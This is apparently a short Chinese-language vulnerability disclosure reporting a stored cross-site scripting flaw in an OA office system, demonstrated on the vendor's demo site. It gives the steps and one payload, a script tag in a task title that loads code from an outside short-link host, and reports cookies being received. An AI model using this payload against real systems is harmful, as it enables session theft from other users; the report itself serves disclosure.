### 简要描述:
某OA办公系统储存型XSS#demo演示
### 详细说明:
### 漏洞证明:
官方站:http://www.oa8000.com/online.htm
[<img src="https://images.seebug.org/upload/201501/28112402fec432e2c74addad5ab71d7cde37323c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28112402fec432e2c74addad5ab71d7cde37323c.jpg)
官方演示站:http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa
[<img src="https://images.seebug.org/upload/201501/281124138fdcb4e225c5743bbbd015acb12aceab.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/281124138fdcb4e225c5743bbbd015acb12aceab.jpg)
普通用户登录,工作中心--任务管理--新建任务
[<img src="https://images.seebug.org/upload/201501/281124559be689a32ee322ba1356ba0333ef7095.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/281124559be689a32ee322ba1356ba0333ef7095.jpg)
在任务标题处写入XSS代码/"><script src=http://is.gd/7NT8vJ></script>
[<img src="https://images.seebug.org/upload/201501/281125239289fce6a6c0db3ebe3e0b328d88b234.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/281125239289fce6a6c0db3ebe3e0b328d88b234.jpg)
查看我们发布的信息,直接查看任务即可,不用查看具体信息。
[<img src="https://images.seebug.org/upload/201501/28112548f4ddca6346a4b20e1f2b8f37cad8e1f9.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/28112548f4ddca6346a4b20e1f2b8f37cad8e1f9.jpg)
成功收到cookie信息
[<img src="https://images.seebug.org/upload/201501/2811262040e65c843d40b1b262b54dbd330d0e41.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2811262040e65c843d40b1b262b54dbd330d0e41.jpg)
京公网安备 11010502034610号
暂无评论